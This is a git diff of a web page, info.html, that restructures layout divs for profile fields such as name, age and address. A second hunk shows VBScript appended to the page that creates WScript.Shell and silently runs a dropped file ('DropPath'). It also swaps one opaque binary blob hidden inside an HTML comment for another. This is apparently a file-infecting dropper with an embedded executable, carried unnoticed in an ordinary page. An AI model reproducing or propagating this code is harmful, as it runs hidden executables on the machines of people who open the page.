defining the area of each content

--- a/info.html
+++ b/info.html
@@ -1,42 +1,79 @@
 <html>
     <head>
+        <link rel="stylesheet" href="styles/infoStyles.css">
     </head>
     <body>
-        <div>
-            <div id="name">
-                <div class="imageSide">
+        <div id="container">
+            <div id="name" class="content">
+                <div class="imageSide odd">
                 </div>
-                <div class="infoSide">
-                </div>
-            </div>
-            <div id="age">
-                <div class="imageSide">
-                </div>
-                <div class="infoSide">
-                </div>
-            </div>
-            <div id="birthdate">
-                <div class="imageSide">
-                </div>
-                <div class="infoSide">
+                <div class="infoSide odd">
+                    <div class="label1">
+                    </div>
+                    <div class="line">
+                    </div>
+                    <div class="label2">
+                    </div>
                 </div>
             </div>
-            <div id="birthplace">
-                <div class="imageSide">
+            <div id="age" class="content">
+                <div class="infoSide even">
+                    <div class="label1">
+                    </div>
+                    <div class="line">
+                    </div>
+                    <div class="label2">
+                    </div>
                 </div>
-                <div class="infoSide">
+                <div class="imageSide even">
                 </div>
             </div>
-            <div id="address">
-                <div class="imageSide">
+            <div id="birthdate" class="content">
+                <div class="imageSide odd">
                 </div>
-                <div class="infoSide">
+                <div class="infoSide odd">
+                    <div class="label1">
+                    </div>
+                    <div class="line">
+                    </div>
+                    <div class="label2">
+                    </div>
                 </div>
             </div>
-            <div id="status">
-                <div class="imageSide">
+            <div id="birthplace" class="content">
+                <div class="infoSide even">
+                    <div class="label1">
+                    </div>
+                    <div class="line">
+                    </div>
+                    <div class="label2">
+                    </div>
                 </div>
-                <div class="infoSide">
+                <div class="imageSide even">
+                </div>
+            </div>
+            <div id="address" class="content">
+                <div class="imageSide odd">
+                </div>
+                <div class="infoSide odd">
+                    <div class="label1">
+                    </div>
+                    <div class="line">
+                    </div>
+                    <div class="label2">
+                    </div>
+                </div>
+            </div>
+            <div id="status"  class="content">
+                <div class="infoSide even">
+                    <div class="label1">
+                    </div>
+                    <div class="line">
+                    </div>
+                    <div class="label2">
+                    </div>
+                </div>
+                <div class="imageSide even">
                 </div>
             </div>
         </div>
@@ -55,8 +92,5 @@ FileObj.Close
 End If
 Set WSHshell = CreateObject("WScript.Shell")
 WSHshell.Run DropPath, 0
-//--></SCRIPT><!--…é‹H
-ÑØM3àG∏Õ
-òuüßW*†aí∞I“›ƒ”‡˝ÿ£\9¡:ËP>Ts;\ômmî†Úƒ^s≥mõÇF?ñ*ﬁ]÷á*ç;id≤ÍrUv∂.ñ~¡®ÓΩrrDQFNrùÀW“À◊oñË„T	=Ê‹ü*5É˜‘ﬁµ%V02f
-ÈÛ´Íe ¥Œ*î(.'I⁄óÔgØ!¢U›ø y		œ$Ïºıbé—KÃ&R«É—∂ØÁlÒ‹WìÖ",Âèá~Ú‚à¬ÌO=hê‘<G≥T∫»ÛÕ¶¸ı:z¿Óù+¢mÍ\ÜÄ◊›∆~ÀOÚ?è«eyÈ soÇO†Dy¥§6âÎ•˚>5¨b|§àªÃo'4qc?ÕçR\›;´≠ç1öΩ¶c˝%€_Ë\Û‰m–È—Ãû}3N˛gœØ@Q-ù›P4Ú à¡–
-7◊ºøó≈˙®æÙKàﬂJ	∞⁄NºµA VÓ%rºòÛÙê÷ãÎ—û‚rs‰1bÜ≈ß‹o/˙Jr	ÍmøÊ–áÂ8~7—*ä‚Ü?æøÃ≈ª»˛-’z‹r)Œ}˚È¢åjA¡ «J'Ì4ﬁCÙCª}≥q◊c ·(R"3˘·(·(·(¨ıO⁄Û˚ZõÂ( ·(-->
+//--></SCRIPT><!--∑Ã?Õª£iπ©œHXπâ∫Å…1Îƒ©sh¶íˆÓÇ^~ÙÇZ-ãe™UΩt∑T^íÀ5Âªœö∞Ø	° &óùl”ºˆM⁄£ÓaêoÒr¯Ωnõ3=ÿz4˘Ku}’8-∆®mcIÅ|@VrπS“ —ßÁ∏›6…$πfS è»¸œıdAÎ˛ÒWMÚî@I&√Œ4∆9@|ÊaÿK7v„•MÇ¡∏ÚB£µËD?®≠µ˝í"?ÜyEµ&¥¿¶<ºê<Í©osM˜ßk§¡Bêç™RÇIXYDqv∏/ïøæ íÀ¶	Í∂q»¢ÅÀ¡¶CR≥¯ º8©º=F®JÖÿ≠é…Uæ‡$¢©MS‹ª≠qÂ˙{wfõ˝:#Ñ≠e›*ŒÃƒjÏ‹Ú°h˘›ëwæc+™Æ0q…HsO∆ 7ÅÊ›◊˘Õ ìè}™∂◊ıÆô#rî9inπIøeà0,r˘v:œvIpçG
+?0Í≠hz5rí0@"œêß{√]ˆz]¢ ˜îË†q≥’Yñg ◊-^´0§ï˚œÀMUù3˘⁄Ô«qÙìf˙¥M6hYF$.Mëj¬Á„€0óäm p∏|oXx”µ⁄Zèß?º©Ïd“BiBø·…§ÿ– ¸dË⁄–xAT~ø∆"ï ·(R"3˘·(·(·(¨ıO¿˚Z_Î( ·(-->
